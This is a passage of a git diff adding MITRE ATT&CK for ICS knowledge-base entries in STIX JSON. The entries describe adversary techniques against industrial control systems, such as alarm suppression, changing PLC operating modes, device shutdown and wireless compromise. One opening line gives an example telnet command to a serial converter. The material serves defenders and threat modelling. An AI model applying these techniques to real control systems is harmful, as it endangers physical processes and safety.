One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Process/Event Alarm", + "Process: Process Termination", + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0805", + "external_id": "T0805" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80.json new file mode 100644 index 0000000000000000000000000000000000000000..25ac6587e7b0045cc0aa81c8740a94a8922b0c2e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--9495669c-3044-4946-bb5a-3abef44ed2fa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Role Identification", + "description": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack.\n\nFor example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary's decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. 
Understanding of master devices and their role within control processes can enable the use of Rogue Master Device", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0850", + "external_id": "T0850" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c.json new file mode 100644 index 0000000000000000000000000000000000000000..e5a09aa36578eceec33a0ebb513ba8ec664445ac --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--480dd457-058d-4688-92ba-087bed09a32e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command-Line Interface", + "description": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.\n\nCLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Application Log: Application Log Content", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + 
"source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0807", + "external_id": "T0807" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1059" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1.json new file mode 100644 index 0000000000000000000000000000000000000000..fc41cd44096800e0b497163dc2500c59c4088353 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--796df28e-687e-4ffe-b3dc-37c73c0b3b84", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Point & Tag Identification", + "description": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience. \n\nCollecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Data Historian", + "Control Server", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0861", + "external_id": "T0861" + }, + { + "source_name": "Dennis L. 
Sloatman September 2016", + "description": "Dennis L. Sloatman 2016, September 16 Understanding PLC Programming Methods and the Tag Database System Retrieved. 2017/12/19 ", + "url": "https://www.radioworld.com/industry/understanding-plc-programming-methods-and-the-tag-database-system" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9.json new file mode 100644 index 0000000000000000000000000000000000000000..d90caef1861e7ce7e2e4cb32167a37c65ba6011f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--9bc19179-391d-4c70-af88-10a498bd8e93", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-26T16:50:56.401Z", + "name": "Device Restart/Shutdown", + "description": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.\n\nUnexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states.\n\nA device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0816", + "external_id": "T0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c.json new file mode 100644 index 0000000000000000000000000000000000000000..2c79796952e2cc78227743bf5a032392fe32b015 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--32c2b0eb-e34f-47cf-82c0-e3d639a29a5a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "User Execution", + "description": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. \n\nAdversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution. 
(Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Command: Command Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0863", + "external_id": "T0863" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 
2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e.json new file mode 100644 index 0000000000000000000000000000000000000000..b9ad778428a0fcd14e6d074e78cc97822efe2ee1 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e.json 
@@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--cd538bb1-62d1-425e-9eb1-25854469a90d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:20:38.285Z", + "name": "Wireless Compromise", + "description": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. \n\nA Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. 
(Citation: John Bill May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_contributors": [ + "Scott Dougherty" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Input/Output Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0860", + "external_id": "T0860" + }, + { + "source_name": "Alexander Bolshev March 2014", + "description": "Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 ", + "url": "https://www.slideshare.net/dgpeters/17-bolshev-1-13" + }, + { + "source_name": "Alexander Bolshev, Gleb Cherbov July 2014", + "description": "Alexander Bolshev, Gleb Cherbov 2014, July 08 ICSCorsair: How I will PWN your ERP through 4-20 mA current loop Retrieved. 2020/01/05 ", + "url": "https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 
2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601.json new file mode 100644 index 0000000000000000000000000000000000000000..e1afa63a33ab499f553f26a7291029ffaf82054e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--1a2cd146-8fa6-4200-a565-fc7d4b0b4c85", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Change Operating Mode", + "description": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. 
(Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0858", + "external_id": "T0858" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 
2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc.json new file mode 100644 index 0000000000000000000000000000000000000000..646ce28f1b850dcf02abaef2cfe49eadf2c16489 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--2685f246-a7fc-4846-b5b0-ddca34288b03", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:13:55.599Z", + "name": "Alarm Suppression", + "description": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.\n\nA Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: \n\n* An alarm raised by a protocol message \n* An alarm signaled with I/O \n* An alarm bit set in a flag (and read) \n\nIn ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. 
(Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Marina Krotofil", + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0878", + "external_id": "T0878" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a.json new file mode 100644 index 0000000000000000000000000000000000000000..fd83fc6580dda558c35c00eb73a1c1b90640f901 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--7936fb78-9021-4c05-80ed-6a676c1b068a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Detect Operating Mode", + "description": "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. 
(Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0868", + "external_id": "T0868" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How 